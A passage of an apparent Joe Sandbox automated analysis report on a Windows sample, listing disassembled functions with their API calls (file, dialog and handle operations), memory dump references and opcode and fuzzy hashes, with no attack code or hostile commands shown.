                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: e615c731bb967ce694874c9677b09ba6c2b72e7a56ecca6f37193844a8980611
                                                                                                                                  • Instruction ID: c10dc4312f1496d58532712f8b7ea0567378bcb5b177b8a74f69ac3dbeaa9431
                                                                                                                                  • Opcode Fuzzy Hash: e615c731bb967ce694874c9677b09ba6c2b72e7a56ecca6f37193844a8980611
                                                                                                                                  • Instruction Fuzzy Hash: BBA011C22A880ABC300822082C02CFB020EE0C2F283308A2EF822C0380A8802C000832
                                                                                                                                  Function 008BE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: b9dd8fc4b11895c2a64c88623a6dd8733064f707696389d2e82b08838044279a
                                                                                                                                  • Instruction ID: c10dc4312f1496d58532712f8b7ea0567378bcb5b177b8a74f69ac3dbeaa9431
                                                                                                                                  • Opcode Fuzzy Hash: b9dd8fc4b11895c2a64c88623a6dd8733064f707696389d2e82b08838044279a
                                                                                                                                  • Instruction Fuzzy Hash: BBA011C22A880ABC300822082C02CFB020EE0C2F283308A2EF822C0380A8802C000832
                                                                                                                                  Function 008BE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE51F
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 022eab7d5b6c900b4fe0ab0ceb5cb132f471c1d79d1d34e2ab10f0bdca2c75c2
                                                                                                                                  • Instruction ID: c10dc4312f1496d58532712f8b7ea0567378bcb5b177b8a74f69ac3dbeaa9431
                                                                                                                                  • Opcode Fuzzy Hash: 022eab7d5b6c900b4fe0ab0ceb5cb132f471c1d79d1d34e2ab10f0bdca2c75c2
                                                                                                                                  • Instruction Fuzzy Hash: BBA011C22A880ABC300822082C02CFB020EE0C2F283308A2EF822C0380A8802C000832
                                                                                                                                  Function 008BE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 008BE580
                                                                                                                                    • Part of subcall function 008BE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 008BE8D0
                                                                                                                                    • Part of subcall function 008BE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 008BE8E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1269201914-0
                                                                                                                                  • Opcode ID: 4fe613f30201f046427a57cb4e7f162662c08d1fe23fa9d6d5c22a0bc7998a6d
                                                                                                                                  • Instruction ID: 40e15154a3a19b4808f4512be9dc1b97e757e13b3f8fe4ed7b7643f865005f2b
                                                                                                                                  • Opcode Fuzzy Hash: 4fe613f30201f046427a57cb4e7f162662c08d1fe23fa9d6d5c22a0bc7998a6d
                                                                                                                                  • Instruction Fuzzy Hash: 3DA011C22A800A3C300822A22C02CFB0A0EE8E0B2A330822FF820C03C0B88028000832
                                                                                                                                  Function 008A9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetEndOfFile.KERNELBASE(?,008A903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 008A9F0C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 749574446-0
                                                                                                                                  • Opcode ID: e960ed865d8c1b3248dfef292775eb463e181b31261cd6457d4000ef5ef9c98c
                                                                                                                                  • Instruction ID: 805802d9d9ff16c5ddab068b0ed55fb251366f7edeae773cfe9ba3ab5d1896a3
                                                                                                                                  • Opcode Fuzzy Hash: e960ed865d8c1b3248dfef292775eb463e181b31261cd6457d4000ef5ef9c98c
                                                                                                                                  • Instruction Fuzzy Hash: 16A0223008080E8BCE002B30CE0800C3B20FB20BC030083E8A00BCF0B2CB238C0BCB02
                                                                                                                                  Function 008BAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetCurrentDirectoryW.KERNELBASE(?,008BAE72,C:\Users\user\Desktop,00000000,008E946A,00000006), ref: 008BAC08
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1611563598-0
                                                                                                                                  • Opcode ID: 3d64e172d99feb00dddc23f68027c9a6bc80aa1a88b2191ac67f09bb8f8cf163
                                                                                                                                  • Instruction ID: 70e3d73da0ec584faaab803cc50cf3455ac9f638ecc74af02da6501090546814
                                                                                                                                  • Opcode Fuzzy Hash: 3d64e172d99feb00dddc23f68027c9a6bc80aa1a88b2191ac67f09bb8f8cf163
                                                                                                                                  • Instruction Fuzzy Hash: F8A011302022028B8A000B328F0AA0EBBAABFA2B00F00C02AB00080030CB30C820AA02
                                                                                                                                  Function 008A9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CloseHandle.KERNELBASE(000000FF,?,?,008A95D6,?,?,?,?,?,008D2641,000000FF), ref: 008A963B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                  • Opcode ID: 921a8a8506a8f395606d78f86a8a9ff3932c33afbc7422f6068cabf1ba050449
                                                                                                                                  • Instruction ID: 249a2188692d3538677e2d6d9800648c98f5e2ca1e5305b89ec368d60276ea4d
                                                                                                                                  • Opcode Fuzzy Hash: 921a8a8506a8f395606d78f86a8a9ff3932c33afbc7422f6068cabf1ba050449
                                                                                                                                  • Instruction Fuzzy Hash: CEF0BE3008AB059FEB308A24C548B92B7E8FF23321F040B1ED1E3C2DE0D360698D8A40

                                                                                                                                  Non-executed Functions

                                                                                                                                  Function 008BC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 008A1316: GetDlgItem.USER32(00000000,00003021), ref: 008A135A
                                                                                                                                    • Part of subcall function 008A1316: SetWindowTextW.USER32(00000000,008D35F4), ref: 008A1370
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 008BC2B1
                                                                                                                                  • EndDialog.USER32(?,00000006), ref: 008BC2C4
                                                                                                                                  • GetDlgItem.USER32(?,0000006C), ref: 008BC2E0
                                                                                                                                  • SetFocus.USER32(00000000), ref: 008BC2E7
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 008BC321
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 008BC358
                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 008BC36E
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 008BC38C
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008BC39C
                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008BC3B8
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008BC3D4
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC404
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 008BC417
                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 008BC41E
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC477
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 008BC48A
                                                                                                                                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 008BC4A7
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 008BC4C7
                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 008BC4D7
                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 008BC4F1
                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 008BC509
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC535
                                                                                                                                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 008BC548
                                                                                                                                  • _swprintf.LIBCMT ref: 008BC59C
                                                                                                                                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 008BC5AF
                                                                                                                                    • Part of subcall function 008BAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008BAF35
                                                                                                                                    • Part of subcall function 008BAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008DE72C,?,?), ref: 008BAF84
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                  • API String ID: 797121971-1840816070
                                                                                                                                  • Opcode ID: 8ca6514651bdb98dfe7df3918d841ffb55c96ae5f5a86b94dc70f110ac13fa04
                                                                                                                                  • Instruction ID: 20698645a05f4bf96cdd1cf54f59ab03c4a21263b1b35970430a861925e54dba
                                                                                                                                  • Opcode Fuzzy Hash: 8ca6514651bdb98dfe7df3918d841ffb55c96ae5f5a86b94dc70f110ac13fa04
                                                                                                                                  • Instruction Fuzzy Hash: 92919272148348BFE6319BA4CC49FFB77ACFB4A704F00491AB649D6181D775AA048B63
                                                                                                                                  Function 008A6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A6FAA
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7013
                                                                                                                                  • _wcslen.LIBCMT ref: 008A7084
                                                                                                                                    • Part of subcall function 008A7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 008A7AAB
                                                                                                                                    • Part of subcall function 008A7A9C: GetLastError.KERNEL32 ref: 008A7AF1
                                                                                                                                    • Part of subcall function 008A7A9C: CloseHandle.KERNEL32(?), ref: 008A7B00
                                                                                                                                    • Part of subcall function 008AA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641,000000FF), ref: 008AA1F1
                                                                                                                                    • Part of subcall function 008AA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,008A977F,?,?,008A95CF,?,?,?,?,?,008D2641), ref: 008AA21F
                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 008A7139
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 008A7155
                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008A7298
                                                                                                                                    • Part of subcall function 008A9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008A73BC,?,?,?,00000000), ref: 008A9DBC
                                                                                                                                    • Part of subcall function 008A9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 008A9E70
                                                                                                                                    • Part of subcall function 008A9620: CloseHandle.KERNELBASE(000000FF,?,?,008A95D6,?,?,?,?,?,008D2641,000000FF), ref: 008A963B
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA501
                                                                                                                                    • Part of subcall function 008AA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,008AA325,?,?,?,008AA175,?,00000001,00000000,?,?), ref: 008AA532
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                                                                                                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                  • API String ID: 3983180755-3508440684
                                                                                                                                  • Opcode ID: 662c1dd5067a0c3168886b3d9399c6a254894a4a2538813d2c756d0205d32739
                                                                                                                                  • Instruction ID: e3922c6d58f32c6c1133154131907095f260a993fc7f8a8051c9acd9a24eaadc
                                                                                                                                  • Opcode Fuzzy Hash: 662c1dd5067a0c3168886b3d9399c6a254894a4a2538813d2c756d0205d32739
                                                                                                                                  • Instruction Fuzzy Hash: 06C1C571904644AEEB25DB78CC45FEEB3A8FF06300F00455AF956E7682E734AA44DB62
                                                                                                                                  Function 008CD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                  • Opcode ID: f9294788ce3309b64b2efac392218ab5bd5d52b9dd4dd25f52c277a1299e2666
                                                                                                                                  • Instruction ID: cae681d23d13f29224a58aae15fdcdf1bbd214082c453476fd67af3b30ca6f9f
                                                                                                                                  • Opcode Fuzzy Hash: f9294788ce3309b64b2efac392218ab5bd5d52b9dd4dd25f52c277a1299e2666
                                                                                                                                  • Instruction Fuzzy Hash: 2EC22772E086288FDB25DE289D40BEAB7B5FB44315F1541EED84EE7241E774AE818F40
                                                                                                                                  Function 008A32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog_swprintf
                                                                                                                                  • String ID: CMT$h%u$hc%u
                                                                                                                                  • API String ID: 146138363-3282847064
                                                                                                                                  • Opcode ID: 84d8099a04b6484f590984856430565106f74f03a321f0f0eb18ef1de97e4389
                                                                                                                                  • Instruction ID: c0a60b66ea6ad26dcebde75467305aa4e4ebb51a24b2cd09761776a4a4791359
                                                                                                                                  • Opcode Fuzzy Hash: 84d8099a04b6484f590984856430565106f74f03a321f0f0eb18ef1de97e4389
                                                                                                                                  • Instruction Fuzzy Hash: 9232B3715107849FEB14DF78C895AEA3BA5FF16300F080479FD8ACB682DA749649CB61
                                                                                                                                  Function 008A286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A2874
                                                                                                                                  • _strlen.LIBCMT ref: 008A2E3F
                                                                                                                                    • Part of subcall function 008B02BA: __EH_prolog.LIBCMT ref: 008B02BF
                                                                                                                                    • Part of subcall function 008B1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,008ABAE9,00000000,?,?,?,00010424), ref: 008B1BA0
                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008A2F91
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                                                                  • String ID: CMT
                                                                                                                                  • API String ID: 1206968400-2756464174
                                                                                                                                  • Opcode ID: 9615c209d27ca8b085f14af3852d153c00c4b46cbd8b17e2d33aabf25cac08c0
                                                                                                                                  • Instruction ID: f44913e1d500f1f04735b56d6ac007c8182bb995c7964989181eaefef3c7c225
                                                                                                                                  • Opcode Fuzzy Hash: 9615c209d27ca8b085f14af3852d153c00c4b46cbd8b17e2d33aabf25cac08c0
                                                                                                                                  • Instruction Fuzzy Hash: 8A62F5715002448FEB29DF38C885BEA3BA1FF56310F08457EEC9ACB682DB759945CB61
